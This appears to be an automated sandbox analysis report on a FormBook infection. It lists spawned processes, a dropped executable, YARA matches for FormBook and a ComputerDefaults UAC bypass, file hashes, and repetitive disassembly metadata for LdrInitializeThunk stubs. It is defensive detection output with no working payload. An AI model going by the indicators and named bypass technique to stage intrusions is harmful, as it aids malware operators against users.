00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5692, Parent PID: 6128

General

Target ID:	5
Start time:	14:00:30
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6124, Parent PID: 5692

General

Target ID:	7
Start time:	14:00:30
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Djfypqyfx.exePID: 5068, Parent PID: 3968

General

Target ID:	11
Start time:	14:00:32
Start date:	08/08/2022
Path:	C:\Users\Public\Libraries\Djfypqyfx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Djfypqyfx.exe"
Imagebase:	0x400000
File size:	732672 bytes
MD5 hash:	251EF95E26D436E7BFE64636978DCC4B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000B.00000000.319230317.00000000023A8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Djfypqyfx.exePID: 5460, Parent PID: 3968

General

Target ID:	15
Start time:	14:00:41
Start date:	08/08/2022
Path:	C:\Users\Public\Libraries\Djfypqyfx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Djfypqyfx.exe"
Imagebase:	0x400000
File size:	732672 bytes
MD5 hash:	251EF95E26D436E7BFE64636978DCC4B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000F.00000002.379536299.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5432, Parent PID: 5068

General

Target ID:	17
Start time:	14:00:43
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5444, Parent PID: 5432

General

Target ID:	18
Start time:	14:00:43
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3968, Parent PID: 5692

General

Target ID:	20
Start time:	14:00:53
Start date:	08/08/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 768, Parent PID: 5460

General

Target ID:	22
Start time:	14:01:06
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6136, Parent PID: 768

General

Target ID:	24
Start time:	14:01:07
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 1428, Parent PID: 3968

General

Target ID:	30
Start time:	14:01:49
Start date:	08/08/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0xba0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: cmd.exePID: 5692, Parent PID: 6128COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	57.7%
Total number of Nodes:	1642
Total number of Limit Nodes:	59

Executed Functions

Function 0370A3B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0370A3BA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55268abb050a14efd732e283d18b84b6fff800bab6b61800b92b0a04b13191a8
Instruction ID: 3420d805d69d1e9d70e026a6a319a29877c9a9844ae72ec805eb2786a93590d2
Opcode Fuzzy Hash: 55268abb050a14efd732e283d18b84b6fff800bab6b61800b92b0a04b13191a8
Instruction Fuzzy Hash: 3B90027220149406E250B55D844461B5445A7E4341F51C821E0416554C87558866B661

Uniqueness

Uniqueness Score: -1.00%

Function 03709A50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03709A5A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab10b1178b5c7b98ac821e14b1ea8b7f63fb1a6ae9270003cdd5d2fc32502157
Instruction ID: fe86e1c95652919c2d02e22773849ef014f431e7640442be410796494f92aa1e
Opcode Fuzzy Hash: ab10b1178b5c7b98ac821e14b1ea8b7f63fb1a6ae9270003cdd5d2fc32502157
Instruction Fuzzy Hash: 7390026221185446E310A96D4C14B17044597D4343F51C525A0145554CCA5588717961

Uniqueness

Uniqueness Score: -1.00%

Function 03709A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03709A2A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66f7a07f2dc585f439aa771b3df56cd37491b345ff620f3f7bd20ee61eb8e3d6
Instruction ID: 47aa02a6136edcf0c4f918d3ec53f82871a0bb5dc7c211e09e1dafa66c39015d
Opcode Fuzzy Hash: 66f7a07f2dc585f439aa771b3df56cd37491b345ff620f3f7bd20ee61eb8e3d6
Instruction Fuzzy Hash: 84900262601054465250B56D88449164445BBE5251751C531A0989550D869988757AA5

Uniqueness

Uniqueness Score: -1.00%

Function 03709950 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370995A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8893b5e1bb49783b57efd6c2626229f235f22ac4204991135c2c62a42c45b9cf
Instruction ID: 7a2b4cdb38e4e0bda3c1cd0c030db9e50363f54301e11b4a9e9c180f8b23e64a
Opcode Fuzzy Hash: 8893b5e1bb49783b57efd6c2626229f235f22ac4204991135c2c62a42c45b9cf
Instruction Fuzzy Hash: 8F9002A220145807E250A95D4804617044597D4342F51C421A2055555E8B698C617575

Uniqueness

Uniqueness Score: -1.00%

Function 03709910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370991A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b4e32080ffa6796bebd325d391a02129c33c20b99e817ac4c58d1efcdad8518
Instruction ID: 97fe631fc245bd2c33c8d5057109611c06f5baccd5341ec3fe29592f5017e993
Opcode Fuzzy Hash: 4b4e32080ffa6796bebd325d391a02129c33c20b99e817ac4c58d1efcdad8518
Instruction Fuzzy Hash: AD9002B220105806E250B55D4404756044597D4341F51C421A5055554E87998DE57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 037099A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 037099AA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3a06ee38b1e76086b02721cab702bbd02f8335661d7eb8d937a863f5b15d6c5
Instruction ID: 9d2959bdd21707cc5bd6f588ea8dcd99af5207d1838cd9e4976f683e6869d0a2
Opcode Fuzzy Hash: e3a06ee38b1e76086b02721cab702bbd02f8335661d7eb8d937a863f5b15d6c5
Instruction Fuzzy Hash: FB9002A234105846E210A55D4414B160445D7E5341F51C425E1055554D8759CC627566

Uniqueness

Uniqueness Score: -1.00%

Function 03709860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370986A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7c36ff2ecf87efb5cf25b77342850943aa7c293d9ac6f02692b160c63d93e86
Instruction ID: 594228d29f42ac8f28fe7bc232e7a00a99ede0c2ba813d13b16e56aa7dc02c6d
Opcode Fuzzy Hash: d7c36ff2ecf87efb5cf25b77342850943aa7c293d9ac6f02692b160c63d93e86
Instruction Fuzzy Hash: DB90027220105817E221A55D4504717044997D4281F91C822A0415558D97968962B561

Uniqueness

Uniqueness Score: -1.00%

Function 0370B040 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0370B04A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d95a2d1fc1efb25ef3557794eb0a0908fdd1c89bbcb9fea9806e2aa86bb8d8b
Instruction ID: 83cff0f3640450b0724925d096ff0f534d41717bd800945e66710f277ae613b9
Opcode Fuzzy Hash: 4d95a2d1fc1efb25ef3557794eb0a0908fdd1c89bbcb9fea9806e2aa86bb8d8b
Instruction Fuzzy Hash: 309002A2601194475650F55D48044165455A7E5341391C531A0445560C87A88865B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 03709840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370984A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1450a3d20b44cfa3c594736b3d6787f4f5f55960fa6ae2c3c8991a7eee88a57a
Instruction ID: a40b551fe933aa51dfbf1e43d99c05002982dcbb242ca8a920780bdb8535d832
Opcode Fuzzy Hash: 1450a3d20b44cfa3c594736b3d6787f4f5f55960fa6ae2c3c8991a7eee88a57a
Instruction Fuzzy Hash: 75900262242095566655F55D44045174446A7E4281791C422A1405950C86669866FA61

Uniqueness

Uniqueness Score: -1.00%

Function 03709710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370971A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf72eddcf8b12ab0c0616eadc45317520c408a212de5a1584813877c248a54d
Instruction ID: 4ce78b971cb306d810920bc0299d20f6421b47f2d3a1dedbfaf3d540162889c7
Opcode Fuzzy Hash: 5cf72eddcf8b12ab0c0616eadc45317520c408a212de5a1584813877c248a54d
Instruction Fuzzy Hash: 6C90027220105806E210A99D5408656044597E4341F51D421A5015555EC7A588A17571

Uniqueness

Uniqueness Score: -1.00%

Function 03709FE0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03709FEA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 745da8a9b57b23153a64fe16c1409e62d753b597ddc6777c020d38320b589160
Instruction ID: a64c4f1d9fb7f2f333f173e26ba636ea50566128b15e5d6919995e2ad81424a5
Opcode Fuzzy Hash: 745da8a9b57b23153a64fe16c1409e62d753b597ddc6777c020d38320b589160
